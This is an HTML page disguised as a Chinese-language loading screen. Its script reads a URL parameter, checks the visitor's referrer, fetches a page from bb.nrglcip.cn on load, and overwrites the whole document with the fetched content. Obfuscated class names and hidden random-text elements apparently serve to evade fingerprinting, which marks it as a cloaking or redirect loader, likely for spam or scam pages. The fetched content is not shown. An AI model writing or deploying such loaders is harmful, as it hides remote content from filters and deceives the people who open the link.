<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .I222GiW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .I222GiW .euJtQ4IIB {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .I222GiW .content {
            line-height: 50px;
            text-align: center
        }

        .I222GiW .img {
            width: 100%
        }

        .I222GiW .LrVjdOn {
            text-align: center
        }

        .I222GiW .LrVjdOn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .I222GiW .LrVjdOn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .I222GiW .LrVjdOn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .I222GiW .LrVjdOn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .I222GiW .LrVjdOn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .I222GiW .LrVjdOn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .I222GiW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HKwWlkrFSYCf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var gjh1k4 = HKwWlkrFSYCf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ gjh1k4 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ gjh1k4 +".html?a=share";
		}
		
        AZgFxJc1=url+"#"+new Date().getTime();
        AZgFxJc1 && function() {
            $.get(AZgFxJc1, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>HM22tEbF2fCycOt0cL5LazIDy9TSij9Myfz9WnuluzYQ6Q3Y77tBN5Vwk4G</p>
<h1 style='display:none' >RL4rsh4bMNbcVfnh1ClBHQY6arjoYHGiVhw5E2ZjYPzyjy6xde71WM2lcah0iVpnzG7TW1TW221SLaYGoS5</h1>
<span style='display:none'>bp6tn9fSgEcR1rbOKST42ST6NuTRxK9xS8cfoK7JTsrkW</span>
<li style='display:none' >hfMUnER52XYLh</li>
<img  src='' style='display:none'>
<ul style='display:none' >RaGilfBDmEmGLW734NdyfxKpGomNn4XosZSAKIuP</ul><div class="I222GiW">
    <div class="euJtQ4IIB">
        <div class="LrVjdOn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>XQna8ZLCJIOC2qmHXuPTqAt6xb7UfmRg2nxdulw</span>
<img  src='' style='display:none'>
<ul style='display:none' >CO2VwW2F3mZTWmG8UNGjWzNhJxBOCRal3LihXMxdr1K1xVJSduxY</ul>
<div style='display:none'>ZgkzgS7vfN9IdFVnPBj0zFMOw6Df</div>
<span style='display:none'>XQna8ZLCJIOC2qmHXuPTqAt6xb7UfmRg2nxdulw</span>
<h1 style='display:none' >aIMfahKsFQDXspgjhpeadgMLAy44y2XbW3FarNVfjmNUVSEKnNyucjixs1B0fTFMMbJNgJFR7PWVlrhjO6SSz4m</h1>
<img  src='' style='display:none'></body>
</html>